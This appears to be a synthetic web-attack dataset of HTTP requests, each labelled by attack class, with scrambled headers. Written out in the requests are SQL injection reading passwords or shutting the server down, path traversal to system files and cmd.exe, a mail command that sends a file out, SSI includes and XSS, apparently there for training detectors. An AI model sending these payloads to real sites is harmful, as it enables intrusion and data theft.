Client-ip: 237.68.176.239
Cookie: hStT5g=jY2J1;Oethrashnawo=i-nadminsswiframeeaallsnfk;tj3ucsdrleedd=erri;yu@LK2Zn.40G=3qC0V6n7js;systemZeY=n krntn;tbtea=d549@CUi4
Cookie2: $Version="950"
Date: Fri, 25 Jan 08 21:27:55 CET
ETag: "BSZ0DEttcU_5_LcM"
Expect: lelwnt
From: xwfji@6eera.be
If-Modified-Since: Sat, 30 Aug 08 10:49:26 UTC
If-Unmodified-Since: Wed, 13 Dec 06 22:51:25 GMT
If-Match: "89qyYq7ag@mcdLk9Mw"
If-None-Match: "hWceBVZBcyHem7PY4"
If-Range: Fri, 30 May 08 21:51:36 UTC
Max-Forwards: 98
MIME-Version: 7.8
Pragma: 1fcgiy='riss'
Proxy-Authorization: NTLM b2xzb3NobDl0dG9mbWpvZTJmc2VmczJlZWhlZm10cWV0aHN1bGNvNmliZDg=
Authorization: ytkd2f r9ns9e=yODl
Range: 629953-,-3
Referer: http://itKcoT.de/s9o9irLd/r7LZrn.pdf
TE: trailers,trailers,trailers
Trailer: If-Range
User-Agent: Mozilla/9.7 (X11; U; Open BSD i386 8.9; jc-ei; rv:1.4.1) Gecko/46593954
UA-CPU: StrongARM
UA-Disp: 989,4955,16
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 1852x515
Via: HTTP/2.9 www.uwip.gif, 3.0 169.72.154.142:51532, 0.2 42.201.7.214:312
Transfer-Encoding: gzip
Upgrade: Epoll/4.7, sesde/6.4, Uar/2.7, i4she/5.4, mukl/7.2
Warning: 480 www.mfahnai.css "oldac4" "Mon, 15 Jun 09 01:00:23 UTC"
X-Forwarded-For: 166.15.230.232
X-Serial-Number: 27867012215439
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41574
Start - Id: 49379
class: XPathInjection
GET /oWbm-j/hLmA@kP1F.tiff?8K1pa=iIVjaka_%40y%40w&esah9htk67=opl5sqvorru&xttt=35++or++1%3C+++++sa8Il%2Fa3Loia%2FznO%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D4%5D+++or+++++788%3D%27%5D+%7C+%2F*+%7C+%2Ffoo%5Bbar%3D%27&alwfc=560 HTTP/1.0
Host: www.eeqyUqlelt.gov
Connection: close
Accept: */*
Accept-Charset: koi8-r;q=0.4, isiri-3342
Accept-Encoding: 
Accept-Language: *;q=0.7
Cache-Control: no-store
Client-ip: 52.139.126.66
Cookie: oThvslw=71;gi7rrmsru6=l9e;tee=ryhd3;sttMnel=seetl(iti;eeBomresiac=u\sa~tkrt
Cookie2: $Version="66"
Date: Sun, 11 Feb 07 18:13:31 GMT
ETag: "8EMWsrpgGBvHJnZ9p9om"
Expect: 0sTS
From: otln@tpiaietAi5.st
If-Modified-Since: Sun, 30 Nov 08 24:14:25 UTC
If-Unmodified-Since: Mon, 31 May 04 13:01:45 UTC
If-Match: *
If-None-Match: *
If-Range: Wed, 22 Jul 09 15:38:40 CET
Max-Forwards: 1
MIME-Version: 7.0
Pragma: no-cache
Proxy-Authorization: gWoe no1msa3=apmn
Authorization: 878eg 7nct0tke=ns8hu
Range: 6-,-18019
Referer: /l9rth/ssxno/EsoHn8pn/onuv.mdb
TE: chunked
Trailer: Pragma
User-Agent: Mozilla/1.1 (Machintosh; U; PPC Mac OS X 4.4; se-r9; rv:2.6.7) Gecko/62045978
UA-CPU: StrongARM
UA-Disp: 129,1543,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 0695x2392
Via: 6.9 www.fp7naYe.png, FTP/6.3 www.nrviim.html, pike/0.2 95.107.182.137:68
Transfer-Encoding: identity
Upgrade: peor/1.1, d2rrnr/4.2
Warning: 968 150.103.51.182:94997 "eidcatleEean" "Fri, 27 Aug 04 02:02:34 GMT"
X-Forwarded-For: 100.79.4.137
X-Serial-Number: 68426632486242488
----: ---------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 49379
Start - Id: 36022
class: PathTransversal
GET /tiZxFMJ0i/ewzdxE@OwXBn0PQVLjx/yo/ctcmdhJ9PGRVq/omt9siicntl2gcnE5hte/ah/dbcEIE.BCZeH/vvc44gS/andcopy.jpg?XYBQ=mtrrtmp3&YO0FQ=hcQ&tpoasgihds=20471&scsokrv3a=21289&JREps=nowfeo7h&rxtftz7iagtana=ft%2Faatb&wan=50743&aewvmol9dlgera=05291932&oseeolr=..%2F..%2F..%2FWINNT%2Fautoexec.bat HTTP/1.1
Host: www.ensu.ch
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.0
Accept-Language: oacs1n-ftllwTa;q=0.2, ca3sgon4-ntw;q=0.6, f-aalRvyE, aYAr-muoer4m
Cache-Control: only-if-cached
Client-ip: 210.211.62.6
Cookie: Ed2ses=142;t8Ovtt1enenaat=wtSohd;ls9daovesatcMAe=en i;dneesiei067=tQbm
Cookie2: $Version="5"
Date: Mon, 21 Mar 05 01:50:55 GMT
ETag: "1a58EMborIstQSXjUbu@"
Expect: ynaht
From: e1ea@teeopdrn.uk
If-Modified-Since: Thu, 01 Sep 05 06:17:47 CET
If-Unmodified-Since: Wed, 03 Aug 05 16:08:54 GMT
If-Match: *
If-None-Match: *
If-Range: "VXH3euDX1VSxUnsYb"
Max-Forwards: 38
MIME-Version: 2.6
Pragma: no-cache
Proxy-Authorization: NTLM bmFiRXRsbmlnZXplYWxzTml1bWVlYWVyYWFzdHNkZDh4YTE0bmo=
Authorization: Digest opaque="ek3w"
Range: -05066,-92,-024075
Referer: /cws2/h8itiu.tiff
TE: chunked;q=0.5
Trailer: Host
User-Agent: Mozilla/9.9 (X11; U; Linux i386 6.1; tn-ma; rv:6.1.5) Gecko/10130918
UA-Disp: 097,2396,8
UA-Color: color8
Via: FTP/9.2 www.jceHisw.css, FTP/3.6 254.83.113.103:50010
Transfer-Encoding: deflate
Warning: 366 209.231.92.237 "1njhsgaZmEo" "Fri, 29 Feb 08 20:21:14 CET"
X-Serial-Number: 83480
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36022
Start - Id: 36535
class: OsCommanding
GET ..%2f..%2f..%2f..%2fwinnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: 97.104.129.65
Connection: xneh
Accept: video/*;q=0.4
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.9
Cache-Control: no-cache
Client-ip: 213.233.54.110
Cookie: els=objectdR/cgc$Tllrdg|include;Ttelnet>;kalpsXEEfa=sjadr1acthn;otcoEf=iCmY
Cookie2: $Version="6"
Date: Mon, 24 Jan 05 01:16:21 GMT
ETag: W/"yNxrVMzdmzleBQUFZ"
Expect: 9nww
From: rteeiu@new9Eetlcd.org
If-Modified-Since: Sun, 27 Aug 06 19:58:50 GMT
If-Unmodified-Since: Fri, 21 Nov 08 17:48:25 CET
If-Match: "99DCnEFU1GYMcD9k"
If-None-Match: "HWXspFdFV_utEpAEBu"
If-Range: Sat, 20 Nov 04 20:30:16 CET
Max-Forwards: 8
MIME-Version: 3.0
Pragma: arhDa=trSgse
Proxy-Authorization: Basic MnNlMG9hb1U6endvb2N0cW8=
Authorization: ebie lqim0=ntd5
Range: 01232-,419-,638-
Referer: http://www.toinm9vi.net/rdO2ahbi/sot6.jsp
TE: trailers,deflate,trailers
Trailer: Via
User-Agent: Mozilla/0.4 (compatible; MSIE 9.8; Open BSD i386; emLbes18bl; dlDz)
UA-CPU: x86
UA-Disp: 0316,285,32
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 547x5195
Via: 1.7 184.212.133.237
Transfer-Encoding: compress
Upgrade: ernz/8.4, hotewo/3.0, etdeas/6.6, nbu/1.6, owgLo/3.9
Warning: 375 www.gfsleIzg.jpg:66 "hjNhnn62m" 
X-Forwarded-For: 149.92.182.203
X-Serial-Number: 55534835625911216707
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36535
Start - Id: 48975
class: XPathInjection
GET /ue/o.-_vCasib9K@uJfky/Z3AL0x7K1/i-pCAiA-nRXC7A/r7ehob3ps/a1@f/Epasswdphpxl.vxmlexmlR8/txbEt1u.html?h4obeee=IEgwol%27+++or+++++sufEZ%2Fhw%2Fchild%3A%3Anode%28%29%5Bprocessing-instruction%28%29%3D5%5D+++or+++++%27ds%27%3D+%27 HTTP/1.1
Host: www.SSItwAIsb.st
Connection: asynp
Accept: */*;q=0.3
Accept-Charset: x-mac-korean;q=0.1
Accept-Encoding: 
Accept-Language: PPelxap-Qboeuoi
Cache-Control: max-stale
Client-ip: 196.26.247.32
Cookie: hb1odHw=0061587;ereihbnsen=ecypf6BIIN;XD.WTCrW9LL-=alqmkbJ;yoiehuOi=1297;Relogmgiernwz=621230;sxqoeee=2699452691
Cookie2: $Version="23"
Date: Fri, 06 Jan 06 14:59:26 UTC
ETag: "4QmhRB4r6WXtHBkjG4w"
Expect: 100-continue
From: Sd34@Ehnom.cz
If-Modified-Since: Tue, 19 Jun 07 04:59:22 GMT
If-Unmodified-Since: Tue, 23 Jan 07 15:41:20 CET
If-Match: "JzW6BvOIMdfagAr52dx"
If-None-Match: *
If-Range: "HbC@i-uHkoCB70@3dl7"
Max-Forwards: 1638
MIME-Version: 6.3
Pragma: no-cache
Proxy-Authorization: NTLM RmE3Nm9vdGNCZ3BlaXk4ZHJ3aHNiRWVueWRucWVuZ20=
Authorization: ltecs izzi=e1tnnski
Range: 23-,057-,45-
Referer: /tywhhitc/3aoz.jpg
TE: chunked
Trailer: Accept-Encoding
User-Agent: rvTuIUZ-l http://www.cnum.fr
UA-CPU: 68000
UA-Disp: 757,752,8
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 395x881
Via: FTP/5.0 www.aiao.png, 8.9 14.84.215.100
Transfer-Encoding: bc6a
Upgrade: ridti/5.6, m2mn/9.7, 5cse/3.2, eaEos/5.1
Warning: 248 www.elmeri.shtml "SdvreCihiq" 
X-Forwarded-For: 235.34.139.147
X-Serial-Number: 544350626543951868
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48975
Start - Id: 38403
class: LdapInjection
GET /95QQnph-BX5ZgNV/mnaenziafscim6/tdoc9tNnyz/n3vnhha3BDdunc1b/ezhsrh1oN/o4BJ3m.tqxCnT3n2ygU/dvtTM/htds/pgnatAsaee.swf?enyOgi8avid=%22%29%28targetfilter%3D%28o%3DNetscapeRoot%29%29&hkemsmed=114742&gTkm=oBdrop%5Doibne HTTP/1.1
Host: 116.97.56.61
Connection: keep-alive
Accept: image/*;q=0.6, text/*;q=0.4
Accept-Charset: *;q=0.8
Accept-Encoding: 
Accept-Language: *;q=0.0
Cache-Control: no-store
Client-ip: 214.154.43.120
Cookie: tcfeis47d=noeiG;9eto0=Renbc9;rrmOcedkautD8=me9awls;gMobject5oXR0HR=Oro;autEtaHtynnM2oe=edFz9ahndnem5h;B0wh2kscywttdc=eeb
Cookie2: $Version="47"
Date: Sat, 03 Apr 10 04:48:57 CET
ETag: W/"ZQSWlV9na2_UGVxwVs"
Expect: 100-continue
From: ma7N@qaot.net
If-Modified-Since: Fri, 27 Feb 04 13:49:22 CET
If-Unmodified-Since: Mon, 14 Apr 08 22:06:59 UTC
If-Match: "suQwAJicb-rcOSKZMrZ"
If-None-Match: "MYcPA9YU0h1iquSRf"
If-Range: Mon, 10 Jan 05 24:27:15 UTC
Max-Forwards: 174
MIME-Version: 0.1
Pragma: uaNns='egidur'
Proxy-Authorization: Basic Z25peXFzaDpld3NkcnA=
Authorization: Digest opaque="uhen"
Range: -96373
Referer: /cof3t/rin7x1o/sejinn/lnkdytan/0cpdD.jpeg
TE: trailers,trailers
Trailer: From
User-Agent: Mozilla/9.2 (compatible; hmte66e; Open BSD i586; raphiqd; etnwsaphv)
UA-CPU: Sparc
UA-Disp: 2631,041,16
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 7262x7113
Via: FTP/0.0 196.51.159.170, t5ode/5.4 www.aIeotEm.jpeg
Transfer-Encoding: deflate
Upgrade: rlwdd/8.0, wre/1.9, b3o/6.7
Warning: 267 www.otmR1ir.htm "emnzR" "Mon, 09 Jun 08 08:56:30 UTC"
X-Forwarded-For: 139.160.46.245
X-Serial-Number: 8565701730547644653
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38403
Start - Id: 47454
class: XSS
GET /OboYsu/tu/pmbNrbi6Q782umVvN/i5-9N/kTiYnqdWvIEPI/nDdeZyN0R5r/GkswvCMZ-N6ka2W/nolgusOsyewe6ftrp.msf?urgdhselrar9w4c=ACi&rneege=%5Da+b+oapasswd+ursew+nlL&if7ouEwdvlTapi=c+9T4Mogr8uihOadaj0&hsyirxl6r=%3Cdiv+++++style++%3D++++%22+++++binding%3A+++url%28%5Bhttp%3A%2F%2Fwww.la.com%2Fscript%2FiYtue.aspx%5D%29%3B+%22%3E&rcciJFnhec=alion&hoohlo=0549275&@c0@includevpassthruk95=nIk7&mr748EfigVe=oneiynomdibE&TTwhoeelma=in&iim9=7539877 HTTP/1.1
Host: www.pPwlipayf.net
Connection: s9ieoDq
Accept: */*
Accept-Charset: utf-8;q=0.2, euc-tw
Accept-Encoding: *
Accept-Language: e-t5nee, emepdt-aa;q=0.8, orsfpa4-veanl63;q=0.5
Cache-Control: no-store
Client-ip: 142.227.179.102
Cookie: tva=uwindow.openhome1;rWuiutYt=65355443;weowtOrs= as;ugeeflvtll=brdnh;r4trn=83;Iynei4tixx=39
Cookie2: $Version="073"
Date: Wed, 14 Dec 05 18:31:01 CET
ETag: W/"rp9_AP4VQ-1SnvWS"
Expect: emr8ts
From: eskhrz@f8eyrrtmw.biz
If-Modified-Since: Wed, 19 Dec 07 13:59:23 UTC
If-Unmodified-Since: Mon, 29 Nov 04 18:59:54 GMT
If-Match: *
If-None-Match: *
If-Range: "E8xMKufH0cdVvARJ"
Max-Forwards: 0
MIME-Version: 3.7
Pragma: no-cache
Proxy-Authorization: Digest qop=auth-int
Authorization: Digest algorithm=erorm7y
Range: 9547-817639
Referer: http://www.Qgsise1.biz/prhc8tr.txt
TE: chunked
Trailer: From
User-Agent: 0RrNroe3/8.5.3.8
UA-CPU: MIPS
UA-Disp: 1377,371,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 4532x5831
Via: HTTP/4.5 190.174.118.201, HTTP/6.5 193.41.121.221
Transfer-Encoding: mus4pe
Upgrade: If3b/5.7, ceh/7.0, ns8/1.8
Warning: 308 www.aenio10r.gif "lnesbftg" "Sun, 10 Aug 08 14:30:39 UTC"
X-Forwarded-For: 250.184.177.153
X-Serial-Number: 226091720709125
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 47454
Start - Id: 41555
class: SqlInjection
GET /atmeasoa9stttifRme4o/oqUegsJAKrcwk514V1CF/9Dps/zCo3mX46cuctQY/samb/ct8saee.dll?fhssunr0od5=tlq&ixfpoa=he7f1UAYD8.j&iqnuh=9707978&at4=96&yHvtnRallrs=TcBiaww%5Che&e3tnndHn=%25divE9ucibve&Q99RLGexecR=Uhhttpsdonffn-7h%3A%3Cn%3FHh&iowetaapcr=6tzns&9kiHe-rmoU=6&ilaNnontgir5=9959692&aa6aie67murtb=4785&ozll=%27union++select++++PASSWORD++from+DBA_PASSWORD%3B--&Eeoulhee=870 HTTP/1.1
Host: www.iise9.be
Connection: close
Accept: image/jpeg
Accept-Charset: *
Accept-Encoding: identity;q=0.1
Accept-Language: 2nR-3;q=0.1, erhwvr-s, oqmUooD-mtsUftt3
Cache-Control: only-if-cached
Cookie: vsuMRdni=gLa;srrBqi=lXBnVvQpD;dwfehintmse03e=JrtelnetNa;al1jg4rhscmSc=oeroa6aeslisebmgnt;h3TuwhmIcsesmd=tao] ;bO9gbojtI=bic95zrovd?f=86
Cookie2: $Version="577"
Date: Wed, 03 Oct 07 10:54:43 UTC
Expect: vnri
From: esfthi@adoaa.it
If-Modified-Since: Sat, 12 Dec 09 17:27:27 GMT
If-Match: "FygmEZWjRtgXz2-"
If-None-Match: *
If-Range: Thu, 15 Apr 04 14:50:44 CET
Max-Forwards: 425
MIME-Version: 4.7
Pragma: qmen=s
Proxy-Authorization: NTLM ZWVpdXM4bnZlckFpYW5tMXRoY3JicjJwZEd0TG91bnlBV2F4dXM=
Authorization: Basic VDBkZTphbzNUaGM=
Range: 4-728143
Referer: http://www.d8te3sbe.be/siun.mdb
TE: gzip,deflate
Trailer: Accept-Language
User-Agent: owth (kEPhT47dU7; dhcxvgHQn; sc08geJr)
UA-Pixels: 9596x5714
Via: owe9n/7.7 www.iaeatwci.htm
Transfer-Encoding: compress
Upgrade: oeheiX/0.1
Warning: 924 www.tl2tn2r.tiff:1735 "i0edcChnth5mercmaxie" "Sat, 07 Feb 09 03:06:52 CET"
----: --------------------------------

null

End - Id: 41555
Start - Id: 43180
class: OsCommanding
GET /5U/Eyk0pp0AHihLEpl/oUQmbYYyuf_3cJWhfFV/ce@HEogid25YN@Qch/SO_D/hsnekm1pIasHretw.mdb?XYtnnlCo-b=mail+++++Nihos%40ecols4ei.hdrI04.gov+%3C%3C+%2Ftmp%2Fwu.c+%3B HTTP/1.0
Host: 139.7.248.145:80
Connection: eehkhica
Accept: */*;q=0.9
Accept-Charset: *;q=0.5
Accept-Encoding: 
Accept-Language: w-aee;q=0.1, elena-t9sk4rtp, V8Matoou-r9;q=0.3, t-9rtnzogR, gzieryY-edggrO
Cache-Control: min-fresh=7426
Client-ip: 101.140.81.249
Cookie: oaaN=in7WIxkl;hhsegtfvrmtl=lee21wherer;5p=ay9|tArl;drx1Ntat=fechodh;ascoldyr8nRoeop=5nscript;mjfSh%:oaSsL2;necrakien5=612
Cookie2: $Version="74"
Date: Mon, 30 Oct 06 20:31:39 UTC
ETag: "3n7cYjzbN.STqhi"
Expect: 100-continue
From: uirrjt1@GfnEevribm.be
If-Modified-Since: Sun, 15 Oct 06 22:47:08 GMT
If-Unmodified-Since: Tue, 27 Dec 05 02:01:59 GMT
If-Match: "HH0onu5_nieijQ1.Bi"
If-None-Match: "_XrOkaV-hcx2jyj"
If-Range: Sun, 24 Sep 06 12:14:53 UTC
Max-Forwards: 289
MIME-Version: 6.0
Pragma: esr='1taw'
Proxy-Authorization: hnLn 4itor=97es0a
Authorization: onwph lG2cieBg=omtw
Range: 332370-1588,656-95
Referer: http://sx1meE.gov/qChh/TaaubSp.sh
TE: trailers,trailers,trailers
Trailer: Authorization
User-Agent: Mozilla/9.6 (Windows; U; Windows NT 2.5; it-to; rv:5.1.2) Gecko/77405646
UA-CPU: StrongARM
UA-Disp: 1503,1276,8
UA-OS: Linux
UA-Color: color32
UA-Pixels: 953x846
Via: HTTP/8.1 www.ontw.css
Transfer-Encoding: tirawo
Upgrade: ehu/7.5, lem/4.9, eney/6.2, rTm/6.8, lfh/2.5
Warning: 306 www.gnulF0h.html "etlXa" "Wed, 08 Aug 07 07:40:17 GMT"
X-Forwarded-For: 179.224.81.249
X-Serial-Number: 9831419059
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43180
Start - Id: 40503
class: SSI
GET /I8.dqDOlhome.dj/FV/I8LN/m2MlEJmHrUkwl_-k/5wKKp9Pv90UvIcQX/hnx@0Uqb/ozTG9OvZTTxN7KFDZnem/viJkUiXloyDZ13P.swf?usOndircn=fa&Sng=iHGZ&petaasnhih=%3C%21--+++++%23include++++virtual%3D%22d%3A%5Cwindows%5Cautoexec.bat%22+++--%3E&elosnadise3d=iGt%3DTs0IEf+sowhere&aeneZy6eeie9=amsemi HTTP/1.1
Host: 52.36.195.194:80
Connection: close
Accept: audio/*, video/*;q=0.2, text/html;q=0.6
Accept-Charset: cp-936, us-ascii;q=0.0, us-ascii, x-mac-arabic;q=0.1, windows-1254;q=0.1
Accept-Encoding: *;q=0.7
Accept-Language: Dd8-tr52iul;q=0.7, hnes-oipd5o;q=0.5
Cache-Control: max-age=53
Client-ip: 135.177.105.103
Cookie: siifsttpAe=Gnrsr;8stzyq=<et\d;tmst=odue
Cookie2: $Version="510"
Date: Sat, 23 Oct 04 02:55:33 CET
ETag: "TXYIwLxIT0rM9x@OnOW"
Expect: 100-continue
From: pe1n3lw@grPaOzeer.st
If-Modified-Since: Tue, 05 Oct 04 15:30:16 UTC
If-Unmodified-Since: Sun, 10 Jul 05 18:56:49 CET
If-Match: *
If-None-Match: *
If-Range: "neTXh5W7D.Lkp8qv7V"
Max-Forwards: 6
MIME-Version: 2.3
Pragma: no-cache
Proxy-Authorization: NTLM RWV0b1dIcmVlbkZoZnJyc3RwRGFSM3JobmN1ZW54aUFlbml4NTZodE9waWw=
Authorization: NTLM b2VmdHNzOHRzbmtuaHRvYW10aXNUdGVpZWVhMG5lZ2VmbnJ0OXN0cmVlZXI2dA==
Range: 51862-,762075-08,9969-2
Referer: http://iana.org/mih2v/aTstttn/Atq2et/Esmijl/aim9s.conf
TE: gzip
Trailer: Warning
User-Agent: Mozilla/1.5 (Machintosh; U; PPC 7.3; ee-sh; rv:9.2.4) Gecko/54861929
UA-CPU: 68000
UA-Disp: 591,998,16
UA-OS: Win95
UA-Color: color8
UA-Pixels: 278x2627
Via: 4.2 109.169.206.32
Transfer-Encoding: compress
Upgrade: aen/1.7, T2itt/0.2, tnb/0.4
Warning: 074 www.Paeas.jpg "itu3brrfrgi6re2o3th" 
X-Forwarded-For: 252.212.230.66
X-Serial-Number: 7235239060397255727
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40503
Start - Id: 35671
class: XPathInjection
GET /WFCXPe/s6rnqHLplL/_QcPY7fNinH/mBtb.jpg?ipna0rhnsnaeee=l4ebeE%27+++or+++path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3DN%5D++or+++%27moBf%27%3D%27&etlanh8haAn=nllaU&.Gbo27VY=%3E&qqZTFxAAQA=+y+&rgibe4sSb7=dCi HTTP/1.1
Host: www.rO5cie6sa.net:11
Connection: close
Accept: application/*, image/*, image/*;q=0.6
Accept-Charset: *
Accept-Encoding: *;q=0.2
Accept-Language: t-hor7xis, hOqrjcB-asi, 9wnms-SEJ, h3eulbw-JxvS5sD;q=0.0
Cache-Control: no-cache
Client-ip: 68.97.141.43
Cookie: aTygnhvjmoabe=9342679;ednrnuen3hwF=8gie;lhd=a0YCeH
Cookie2: $Version="890"
Date: Sat, 30 Aug 08 07:35:55 UTC
ETag: "Llo6Q0Dtf73F-LBFZWsG"
Expect: e8c6tipe
From: tgaZ6rhn@dneNoaa.uk
If-Modified-Since: Thu, 08 Oct 09 16:38:14 UTC
If-Unmodified-Since: Mon, 27 Apr 09 16:38:08 GMT
If-Match: "-OtePnzfOtfkoju"
If-None-Match: *
If-Range: "1947u5Zn0GiwsfB"
Max-Forwards: 0084
MIME-Version: 3.1
Pragma: jt='us7Zrs9x'
Proxy-Authorization: Digest username="sudmt"
Authorization: Basic YWUwcjpIdE5tZTl5
Range: -5103
Referer: /6oie5kt/tes5ur.php
TE: chunked,trailers,deflate;q=0.4
Trailer: User-Agent
User-Agent: Mozilla/3.2 (Windows; U; Win98 6.0; sE-rd; rv:9.1.3) Gecko/06465775
UA-CPU: x86
UA-Disp: 466,505,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 2667x788
Via: usna/0.3 www.stumf.jpeg, 7.6 www.htle0ei.gif:9
Transfer-Encoding: compress
Upgrade: pnarot/3.1, 7tgym/1.5
Warning: 250 95.244.16.100 "anwrZ" 
X-Forwarded-For: 214.86.27.10
X-Serial-Number: 24734
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 35671
Start - Id: 42572
class: SqlInjection
GET /cR/ettmi9Anau1riXiit/3socaooeke5/863D/vscriptXPmDS6QxZP/yDsQri/iadHH7sy8gaw4hn7/6oy/HlHK/lYcgaJ5D/ro2etifeh/KCginp.jpg?h0ra3oy=%27%3B+++++shutdown-- HTTP/1.0
Host: 89.183.224.173
Connection: tlnmzi
Accept: */*;q=0.3
Accept-Charset: *;q=0.3
Accept-Encoding: 
Accept-Language: rlhseth1-tgmdvwnb
Cache-Control: lsr=fsstEn
Client-ip: 197.109.140.61
Cookie: mEd=42;olhjtaZrNheifce= s+h3ntmpetebetweenTwt=;nwoesIAeyndieti=taw3 ur;W5eF7ZkWYO=3;nsi=1bi]R lh
Cookie2: $Version="3"
Date: Thu, 28 Jul 05 11:30:07 CET
ETag: "AIbTkMC-@CHeNXLDldey"
Expect: shrot
From: tmTstilr@oerx.it
If-Modified-Since: Sat, 10 Apr 04 07:19:20 CET
If-Unmodified-Since: Sun, 01 Jan 06 24:54:21 GMT
If-Match: "9WySyjfEEFSA.5o"
If-None-Match: *
If-Range: Thu, 03 Sep 09 22:22:36 GMT
Max-Forwards: 77
MIME-Version: 2.8
Pragma: no-cache
Proxy-Authorization: NTLM YWlpU1lrMnI5cnlOa2JsdnZsYWlsUmF3c2U3Yklvb2p0bXRmNmVpcnRs
Authorization: NTLM aGFibG1ubWE3ZXMzbTJ0dXRvb1RtdHNycGlhY21mbENHYWE=
Range: 5581-955144,-188690,326959-661
Referer: /ieWQU8y.php3
TE: chunked,trailers,gzip;q=0.6
Trailer: Expect
User-Agent: rs4ilva (dSopbE; txUzn8oId)
UA-CPU: MIPS
UA-Disp: 276,5579,16
UA-OS: Win95
UA-Color: color32
UA-Pixels: 161x8196
Via: HTTP/1.9 www.i3tk.shtml, iSgt8E/9.2 58.18.147.209:60503, 7.1 www.aoottz.html
Transfer-Encoding: Asgn
Upgrade: lxiev/4.8, Sc4/5.2, owd/0.5
Warning: 740 www.flc6.js "aobefTi4oh6lxaa" "Sat, 01 Jul 06 04:47:36 CET"
X-Forwarded-For: 149.227.177.29
X-Serial-Number: 81684
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 42572
Start - Id: 41570
class: SqlInjection
GET /oqqzeJad1H@moCJ0t/qunKAGxY2uYEPNh@/iishaivtRfwMpndsttu/tao_y1furN2YUci/s_L/wrrrl8/kextl/mY@mr3/eseseutyenfqttspqzE/ogt8seeh.shtml?b0g=%27++%2F**%2F+OR++++%2F**%2F%27%27+++%3D+%27 HTTP/1.1
Host: www.fas3dtte.biz
Connection: close
Accept: */*
Accept-Charset: iso-8859-6;q=0.1, cp-936;q=0.6
Accept-Encoding: *;q=0.7
Accept-Language: mriesmo-ra2IN4, kbeo-24ili
Cache-Control: only-if-cached
Client-ip: 237.68.176.239
Cookie: ote=t63lg%-window.openceeehtpasssboot.inii7fp
Cookie2: $Version="4"
Date: Wed, 03 Aug 05 11:35:27 GMT
ETag: "Mjovsj8NklqegQiwJGfc"
Expect: 100-continue
From: xwfji@6eera.be
If-Modified-Since: Sat, 30 Aug 08 10:49:26 UTC
If-Unmodified-Since: Wed, 13 Dec 06 22:51:25 GMT
If-Match: *
If-None-Match: *
If-Range: Wed, 09 Apr 08 01:36:02 GMT
Max-Forwards: 96
MIME-Version: 7.8
Pragma: 9s='nyecSceh'
Proxy-Authorization: NTLM b2xzb3NobDl0dG9mbWpvZTJmc2VmczJlZWhlZm10cWV0aHN1bGNvNmliZDg=
Authorization: Basic Y2VjbWVkZHE6cW1pZQ==
Range: 629953-,-3
Referer: /0eip/naeLllas/ipmvne.conf
TE: trailers,trailers,trailers
Trailer: If-Range
User-Agent: nkeaTRrxit/1.7.1.9.2
UA-Disp: 989,4955,16
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 1852x515
Via: 9.9 www.a4iT4.shtml, HTTP/2.5 171.241.154.102:01764, ec1eny/3.4 4.73.5.5
Transfer-Encoding: gzip
Upgrade: i1lii/1.8, peora/5.4
Warning: 480 www.mfahnai.css "oldac4" "Mon, 15 Jun 09 01:00:23 UTC"
X-Forwarded-For: 166.15.230.232
X-Serial-Number: 27867012215439
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41570
Start - Id: 41539
class: SqlInjection
POST /tt_0_hO/ew2ru7es/@qIybar5KRC/wXIwhere4/seval4includeNeOP_R67DO@.gif? HTTP/1.0
Content-Length: 211
Content-Language: odls
Content-Encoding: identity
Content-Location: /eoee.js
Content-MD5: ZzVlb2NxaXV5c25yZHVhZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 14 Jan 04 06:36:06 UTC
Last-Modified: Tue, 12 Apr 05 06:59:27 UTC
Host: www.oqnxtci.gov
Connection: C9iN
Accept: video/mpeg, text/plain
Accept-Charset: *
Accept-Encoding: compress;q=0.7
Accept-Language: tJS-icmdcgS;q=0.8, jeo-ddsebza, aelto-hdr;q=0.1, ui-9tkreT, o5hhw-axmdrb1k;q=0.5
Cache-Control: min-fresh=854
Client-ip: 163.65.132.10
Cookie: pc8arhnCzxinia=noa5Zbm.kb;nercwi33eajfe=ohaving=aoelreeiframenczhome
Cookie2: $Version="56"
Date: Thu, 04 Dec 08 22:28:37 GMT
ETag: W/"6-69Euuq1Ajx0PW8f"
Expect: 100-continue
From: ic6p0@srmghef.fr
If-Modified-Since: Thu, 22 Nov 07 18:16:54 UTC
If-Unmodified-Since: Fri, 06 Feb 09 14:21:04 CET
If-Match: *
If-None-Match: *
If-Range: "l33fBw0HiPnWn@zh"
Max-Forwards: 577
MIME-Version: 5.5
Pragma: no-cache
Authorization: Basic ZWx4WWVubTpUWWFpbWg=
Range: 57094-3
Referer: /staeowaa.zip
